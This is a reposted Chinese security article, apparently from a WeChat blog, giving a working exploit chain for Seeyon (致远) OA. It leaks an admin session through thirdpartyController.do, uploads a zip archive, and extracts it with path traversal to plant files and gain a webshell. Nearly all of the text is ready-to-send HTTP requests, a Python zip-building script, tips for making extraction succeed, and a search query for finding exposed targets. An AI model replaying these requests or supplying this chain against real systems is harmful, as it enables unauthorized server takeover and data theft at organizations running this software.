致远OA thirdpartyController.do Session泄露 任意文件上传漏洞
2023-5-15 10:1:57 Author: 星冥安全(查看原文) 阅读量:265 收藏

致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

title="致远"

流程:
首先是构造数据包获取管理cookie值,然后携带cookie值上传压缩文件并进行解压,达到getshell的目的。
1、获取cookie

POST /seeyon/thirdpartyController.do HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Content-Type: application/x-www-form-urlencoded
Host: 
Content-Length: 112
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4


2、上传压缩包

POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
User-Agent: Java/1.8.0_101
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 975
Connection: close
--00content0boundary00
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions"
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Disposition: form-data; name="destDirectory"
--00content0boundary00
Content-Disposition: form-data; name="destFilename"
--00content0boundary00
Content-Disposition: form-data; name="maxSize"
--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"
--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="test.zip"
Content-Type: application/x-zip-compressed
zip文件
--00content0boundary00--


携带cookie上传压缩包之后,返回压缩包的一个id标识
注:这边巨坑,实际测试上传的时候,压缩包内文件只能是数字,超过10也无法解压,并且有时候压缩包必须存在layout.xml 文件(空内容即可)否则在利用解压漏洞时会解压失败

3、解压

POST /seeyon/ajax.do HTTP/1.1
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Java/1.8.0_101
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close
method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]


4、测试上传结果

注:压缩包生成文件

import zipfile
zf=zipfile.ZipFile('test.zip', mode='a', compression=zipfile.ZIP_DEFLATED)
fname=f'..\\1.txt'
shellcode="c9b3995f-2d74-448d-a742-34f72cfa1e14"
zf.writestr('layout.xml', "")
zf.writestr(fname, shellcode)
转载:https://bbs.zkaq.cn/t/30787.html作者:camer欢迎大家去关注作者

欢迎师傅加入安全交流群(qq群:611901335),或者后台回复加群

如果想和我一起讨论,欢迎加入我的知识星球!!!

扫描下图加入freebuf知识大陆

师傅们点赞、转发、在看就是最大的支持

后台回复知识星球或者知识大陆也可获取加入链接(两个加其一即可)


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxMDMwNDE2OQ==&mid=2247489774&idx=1&sn=66e0108dade381da0baa6723a5acbfae&chksm=c12c2e28f65ba73e6ed2282f1ef505055d5ca5d53261130469943d34bd9c133b352f70e013d1#rd
如有侵权请联系:admin#unsafe.sh